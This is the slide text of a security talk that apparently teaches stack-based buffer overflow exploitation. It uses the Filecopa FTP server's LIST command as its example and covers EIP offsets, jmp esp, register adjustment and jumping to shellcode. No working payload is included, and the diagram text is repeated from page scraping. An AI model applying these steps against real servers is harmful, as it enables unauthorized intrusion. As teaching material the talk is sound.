Software Exploitation Techniques by Amit Malik
-
Upload
nu-the-open-security-community -
Category
Technology
-
view
2.396 -
download
1
description
Transcript of Software Exploitation Techniques by Amit Malik
![Page 2: Software Exploitation Techniques by Amit Malik](https://reader035.fdocuments.net/reader035/viewer/2022062614/547b1d86b379593a2b8b4c91/html5/thumbnails/2.jpg)
Application overview
Debuggers
Stack based buffer overflow
Demo
![Page 3: Software Exploitation Techniques by Amit Malik](https://reader035.fdocuments.net/reader035/viewer/2022062614/547b1d86b379593a2b8b4c91/html5/thumbnails/3.jpg)
Filecopa FTP (File Transfer Protocol) server
Port 21
Vulnerable to buffer overflow
![Page 4: Software Exploitation Techniques by Amit Malik](https://reader035.fdocuments.net/reader035/viewer/2022062614/547b1d86b379593a2b8b4c91/html5/thumbnails/4.jpg)
All time favorite ollydbg
Why debuggers ?
Breakpoints
Immunity Debugger
Others
![Page 5: Software Exploitation Techniques by Amit Malik](https://reader035.fdocuments.net/reader035/viewer/2022062614/547b1d86b379593a2b8b4c91/html5/thumbnails/5.jpg)
![Page 6: Software Exploitation Techniques by Amit Malik](https://reader035.fdocuments.net/reader035/viewer/2022062614/547b1d86b379593a2b8b4c91/html5/thumbnails/6.jpg)
Discovered in 1972. Computer Security
Planning Study.
Exploited in 1988. Morris Worm.
Published in Phrack in 1994. Aleph One.
“Smashing the stack for fun and profit.”
![Page 7: Software Exploitation Techniques by Amit Malik](https://reader035.fdocuments.net/reader035/viewer/2022062614/547b1d86b379593a2b8b4c91/html5/thumbnails/7.jpg)
Each function creates its own stack. Caller function stack: known as parent stack. Called function stack: known as child stack.For e.g.
main(){ ASM Pseudo: sum(); _main:
} 123: push ebp 124: mov ebp,esp
125: sub esp,val 126: call _sum 127: mov esp,ebp
128: pop ebp 129: ret
![Page 8: Software Exploitation Techniques by Amit Malik](https://reader035.fdocuments.net/reader035/viewer/2022062614/547b1d86b379593a2b8b4c91/html5/thumbnails/8.jpg)
123: push ebp 124: mov ebp,esp125: sub esp,val126: call _sum127: mov esp,ebp128: pop ebp129: ret
Ret startup()
Ret startup()
ebpebp
Locals main()Locals main()
Ret(127)Ret(127)
ebpebp
Locals sum()Locals sum()
Unallocated spaceUnallocated space
StackGrowt
h
![Page 9: Software Exploitation Techniques by Amit Malik](https://reader035.fdocuments.net/reader035/viewer/2022062614/547b1d86b379593a2b8b4c91/html5/thumbnails/9.jpg)
123: push ebp 124: mov ebp,esp125: sub esp,val126: call _sum127: mov esp,ebp128: pop ebp129: ret
Ret startup()
Ret startup()
ebpebp
Locals main()Locals main()
Ret(127)Ret(127)
ebpebp
Locals sum()Locals sum()
Unallocated spaceUnallocated space
StackGrowt
h
![Page 10: Software Exploitation Techniques by Amit Malik](https://reader035.fdocuments.net/reader035/viewer/2022062614/547b1d86b379593a2b8b4c91/html5/thumbnails/10.jpg)
123: push ebp 124: mov ebp,esp125: sub esp,val126: call _sum127: mov esp,ebp128: pop ebp129: ret
Ret startup()
Ret startup()
ebpebp
Locals main()Locals main()
Ret(127)Ret(127)
ebpebp
Locals sum()Locals sum()
Unallocated spaceUnallocated space
StackGrowt
h
![Page 11: Software Exploitation Techniques by Amit Malik](https://reader035.fdocuments.net/reader035/viewer/2022062614/547b1d86b379593a2b8b4c91/html5/thumbnails/11.jpg)
if the input for localvariables is greater than
thespace allocated tothem..Then……….
Ret startup()
Ret startup()
ebpebp
Locals main()Locals main()
Ret(127)Ret(127)
ebpebp
Locals sum()Locals sum()
Unallocated spaceUnallocated space
StackGrowt
h
![Page 12: Software Exploitation Techniques by Amit Malik](https://reader035.fdocuments.net/reader035/viewer/2022062614/547b1d86b379593a2b8b4c91/html5/thumbnails/12.jpg)
it will overwrite ret(saved EIP)
Ret startup()
Ret startup()
ebpebp
Locals main()Locals main()
AAAAAAAA
AAAAAAAA
AAAAAAAAAAAA…AAAAAAAAAAAA…
Unallocated spaceUnallocated space
StackGrowt
h
Ret startup()
Ret startup()
ebpebp
Locals main()Locals main()
jmp espjmp esp
AAAAAAAA
AAAAAAAAAAAA…AAAAAAAAAAAA…
Unallocated spaceUnallocated space
BeforeBefore AfterAfter
![Page 13: Software Exploitation Techniques by Amit Malik](https://reader035.fdocuments.net/reader035/viewer/2022062614/547b1d86b379593a2b8b4c91/html5/thumbnails/13.jpg)
Vulnerable to Buffer Overflow (LIST
command)
But how we know that server is vulnerable ?
Three methods to find out security bugs.
1.Fuzzing
2.Reverse Engineering
3.Source Code Auditing
![Page 14: Software Exploitation Techniques by Amit Malik](https://reader035.fdocuments.net/reader035/viewer/2022062614/547b1d86b379593a2b8b4c91/html5/thumbnails/14.jpg)
Fuzzing - Send invalid, unexpected, or
random data to the inputs of a program. If
the program fails/crash, the defects can be
noted.
Ok lets send invalid input to our server.
Still listening ? Umm no..gud.
But we don’t know which function is causing
this problem.
![Page 15: Software Exploitation Techniques by Amit Malik](https://reader035.fdocuments.net/reader035/viewer/2022062614/547b1d86b379593a2b8b4c91/html5/thumbnails/15.jpg)
Reverse engineering – is the process of
analyzing a subject system to create
representations of the system at a higher
level of abstraction.
Generally used after Fuzzing.
Provide in-depth information about target.
Sometimes more than source code.
![Page 16: Software Exploitation Techniques by Amit Malik](https://reader035.fdocuments.net/reader035/viewer/2022062614/547b1d86b379593a2b8b4c91/html5/thumbnails/16.jpg)
![Page 17: Software Exploitation Techniques by Amit Malik](https://reader035.fdocuments.net/reader035/viewer/2022062614/547b1d86b379593a2b8b4c91/html5/thumbnails/17.jpg)
Calculate offset for EIP.
ESP is pointing to our buffer.
Aahhh.. problem we don’t have much space
on stack (only 13-14 bytes approx.).
Now what ?? Check other registers.
ECX is pointing but not directly.
![Page 18: Software Exploitation Techniques by Amit Malik](https://reader035.fdocuments.net/reader035/viewer/2022062614/547b1d86b379593a2b8b4c91/html5/thumbnails/18.jpg)
But we have some bytes on stack. Use these
bytes to adjust ecx and then jump to ecx.
We need a jmp esp (address) first.
Note: hard coding the stack address is not a
good practice. Contains null bytes, address
may change.
Search the address in DLLs. Because DLLs
are static at least for same service packs.
![Page 19: Software Exploitation Techniques by Amit Malik](https://reader035.fdocuments.net/reader035/viewer/2022062614/547b1d86b379593a2b8b4c91/html5/thumbnails/19.jpg)
ECX is at 00652984 but our data is at 006529cc (on my system).
Increase ECX, but a little problem that data is used to overwrite EIP.
So increasing ECX to that address gives little space (only 234 bytes approx.)
So increase ECX, that will jump over saved EIP.
![Page 20: Software Exploitation Techniques by Amit Malik](https://reader035.fdocuments.net/reader035/viewer/2022062614/547b1d86b379593a2b8b4c91/html5/thumbnails/20.jpg)
So add ecx,152 bytes. Does it work ??
Nop.. It generate null bytes, can’t use.
Ok add cx,152 bytes.. Should work. Else
increase bytes.
![Page 21: Software Exploitation Techniques by Amit Malik](https://reader035.fdocuments.net/reader035/viewer/2022062614/547b1d86b379593a2b8b4c91/html5/thumbnails/21.jpg)
Now jump to ecx. (instruction). And we have our hellcode ready.
![Page 22: Software Exploitation Techniques by Amit Malik](https://reader035.fdocuments.net/reader035/viewer/2022062614/547b1d86b379593a2b8b4c91/html5/thumbnails/22.jpg)
![Page 23: Software Exploitation Techniques by Amit Malik](https://reader035.fdocuments.net/reader035/viewer/2022062614/547b1d86b379593a2b8b4c91/html5/thumbnails/23.jpg)